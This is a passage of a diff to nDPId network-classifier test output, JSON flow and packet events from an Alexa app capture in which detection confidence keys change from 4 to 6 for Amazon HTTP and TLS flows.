00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) 
AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -706,7 +706,7 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} 
